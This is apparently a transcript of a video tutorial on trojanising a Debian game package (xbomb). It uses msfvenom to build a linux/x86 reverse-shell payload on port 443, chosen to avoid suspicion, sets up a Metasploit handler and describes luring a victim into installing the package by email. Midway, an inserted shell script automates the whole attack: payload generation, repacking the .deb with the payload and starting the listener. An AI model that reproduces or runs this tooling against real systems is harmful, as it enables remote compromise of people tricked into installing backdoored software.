Okay, so now we're going to use the msfvenom command.
Do a quick -h so we can see what kind of options this command takes.
As we can see, this is a standalone payload generator
that replaces msfpayload and msfencode.
It has bundled the functionality of those two tools into this one tool.
So we can specify which payload we want to use, we can look at the different output formats, and we can choose the architecture.
We can also eliminate characters to avoid, which we do have to do for this particular example.
The command is kind of lengthy to type in.
Let me make my window a little bit bigger,
but I'll explain the options that we need as we go through this.
All right, so: msfvenom,
and I need to tell it that my architecture is x86 (-a x86),
and I'll specify my payload with -p. It's a Linux payload.
I already looked up this path, so I know it's there, but you might have to
go into your payloads and do some searching to find the right payload to use. This should work on a Debian Linux system
as long as it's x86 architecture. If it were some other architecture, I'd specify a different value for -a, and the payload would be different as well.
Now I'm going to specify my local host, LHOST,
and that is 192.168...
Then I'm going to specify the local port, LPORT,
and I'm going to use 443. That way it doesn't look like a suspicious port when the victim's system connects back to it.
I'm going to exclude a character with -b.
This example needs this. It's kind of a technical discussion as to why we need to exclude it, but sometimes when you're encoding a payload, certain characters cause compatibility problems.
For this one I know I need to exclude this character. You may have to do your own research, and a little trial and error, to get
your encoding process to work correctly.
My output format (-f) is going to be elf.
We'll look at the list of formats in the help after I generate the payload.
And then my output file (-o): root,
and then usr/games.
That's part of the package; I'm replacing it with my file
that has this payload bundled into it.
So running the command takes a few seconds, and it tells me that it was able to encode
with the shikata_ga_nai
encoder. That's a popular encoder that works quite often, and it tells me that the payload was 98 bytes
and that it was able to
generate the payload. So let's look at the formats real quick.
There are executable formats
and then transformation formats.
Under executable formats, I've got a lot of different options here.
elf just happens to be the one that works correctly for this example, so you're just going to have to trust me on that.
All right, now what I need to do is start my web server.
I want to make sure that I've got the web page
in place, or rather available, for when I
get the victim to click a link that takes them to the website.
All right, so now my next step is to create a handler. When the victim installs the package, their system will generate
a reverse shell back to the attacker machine, so I need to have a handler listening for this connection.
And I can do this from
the command line using msfconsole.
Do a quick -h for this,
and we see that for msfconsole I can specify lots of different options
to run commands from the command line without having to go into the console itself.
We're going to tell it, for instance, that we want quiet mode (-q), so we don't see the startup banner, and then I'll specify the command I want to execute (-x).
I'll enclose that in double quotes so it runs as one complete command,
and I'm going to say use exploit/multi/handler,
and if I separate my commands with semicolons, I can run several commands
on one line effectively. So it's a nice way to do
a lot of work with one simple command. Of course, if you were doing this kind of work regularly, you would save these commands
in a file so you can just copy and paste them, or you can find them in your shell history as well.
All right, so now I want to set the payload.
It helps if you spell it right.
Okay, the payload is going to be linux, because we know it's a Linux machine,
x86, since my shell, if you recall, was an x86 shell,
shell_reverse_tcp. This has to match the payload I encoded so that the shell connects to the proper handler; then the connection should work.
I need to set my local host, LHOST,
and that's going to be 192.168.1... oops, 192.168.126.129. That's the attacker system.
Then I set my local port, LPORT,
and that's going to be 443, as we previously saw.
And then lastly I'll exit with -y, so that it doesn't prompt me for confirmation.
So when this finishes running, it should tell me that it's binding to my current address.
So my LHOST is 192.168.126.129:443.
I can see which payload I've got, my local host, my local port, and now the handler is running,
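To tie the msfvenom and msfconsole steps above together, here is an added example script. It is my own, not the video's or Metasploit's, and it assumes things the video does not state: the package is unpacked and rebuilt with dpkg-deb, the byte excluded with -b is \x00, the replaced binary sits at usr/games/xbomb inside the package, and the package file is xbomb_2.2a-1_i386.deb. The point it adds is the check the video makes verbally: the generator and the handler must agree on payload, LHOST and LPORT, and the output really must be an ELF, before anything is put on the web server.

```shell
#!/usr/bin/env bash
# Added example (not from the video): wraps the msfvenom payload generation,
# the package repack and the msfconsole handler in one script.
# Assumptions not stated in the video: the package is unpacked and rebuilt
# with dpkg-deb, the excluded byte is \x00, and the replaced binary lives at
# usr/games/xbomb inside the package.

LHOST="${LHOST:-192.168.126.129}"      # attacker address from the video
LPORT="${LPORT:-443}"                  # 443 so the callback looks like HTTPS
PAYLOAD="linux/x86/shell_reverse_tcp"  # must match on both sides
ENCODER="x86/shikata_ga_nai"
BADCHARS='\x00'                        # assumption: the video does not name the byte
PKG="${PKG:-xbomb_2.2a-1_i386.deb}"
BIN_IN_PKG="usr/games/xbomb"           # assumption: binary replaced in the package

# msfvenom command line, built as a string so the flags can be checked
# without msfvenom installed. $1 is the output path.
venom_cmd() {
    printf 'msfvenom -a x86 --platform linux -p %s LHOST=%s LPORT=%s -b %s -e %s -f elf -o %s' \
        "$PAYLOAD" "$LHOST" "$LPORT" "'$BADCHARS'" "$ENCODER" "$1"
}

# One-line msfconsole handler: -q drops the banner, -x runs the commands.
handler_cmd() {
    printf 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD %s; set LHOST %s; set LPORT %s; exploit"' \
        "$PAYLOAD" "$LHOST" "$LPORT"
}

# The shell only comes back if payload, LHOST and LPORT are identical on the
# generator and the handler; check that before anything is sent out.
handler_matches_payload() {
    local v h
    v=$(venom_cmd /dev/null)
    h=$(handler_cmd)
    case "$v" in *"-p $PAYLOAD LHOST=$LHOST LPORT=$LPORT"*) ;; *) return 1 ;; esac
    case "$h" in *"set PAYLOAD $PAYLOAD; set LHOST $LHOST; set LPORT $LPORT"*) ;; *) return 1 ;; esac
    return 0
}

# True if the file starts with the ELF magic 7f 45 4c 46 ("\x7fELF");
# a wrong -f value gives the victim a file dpkg installs but cannot run.
is_elf() {
    [ "$(od -An -tx1 -N4 "$1" | tr -d ' \n')" = "7f454c46" ]
}

# Raw-extract the package (keeps DEBIAN/control), overwrite the game binary
# with the generated ELF, rebuild. Needs dpkg-deb and msfvenom.
backdoor_package() {
    local work out
    work=$(mktemp -d)
    out="backdoored_$(basename "$PKG")"
    dpkg-deb -R "$PKG" "$work/root"
    eval "$(venom_cmd "$work/root/$BIN_IN_PKG")"
    is_elf "$work/root/$BIN_IN_PKG" || { echo "msfvenom output is not an ELF" >&2; return 1; }
    chmod 755 "$work/root/$BIN_IN_PKG"
    dpkg-deb -b "$work/root" "$out"
    echo "$out"
}

# Usage: ./backdoor.sh build   -> writes backdoored_<pkg> for the web root
#        ./backdoor.sh listen  -> starts the matching handler
case "${1:-}" in
    build)  handler_matches_payload && backdoor_package ;;
    listen) eval "$(handler_cmd)" ;;
esac
```

Start the listener before the package goes on the web server, since the reverse shell connects at install time. One defender-side caveat worth knowing: the script rebuilds the package without touching DEBIAN/md5sums, so on the victim `dpkg --verify xbomb` (or debsums) will report the replaced binary as modified.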
and the website is up because I started my default Apache service.
Now what I need to do is go to my victim system
and start up my web browser, so go ahead and launch Iceweasel.
I can verify that the web server is there by
typing in its address.
And there's the default page that you get when Debian installs Apache,
so I know the website is reachable.
And as I mentioned before, through social engineering techniques you would send an email to the victim saying, hey, try this new minesweeper game that I created called xbomb, it's a lot of fun. Maybe show some screenshots and make it look interesting.
What we're going to do is
get the file directly using the wget command.
So I'm going to specify my address.
This could be in the link, of course, that you would send to your victim.
I have to make sure I get this exactly right:
xbomb_2.2a-1_i386.deb.
I'll double check that.
All right, so on the victim machine, they click the link.
That's not what I was expecting.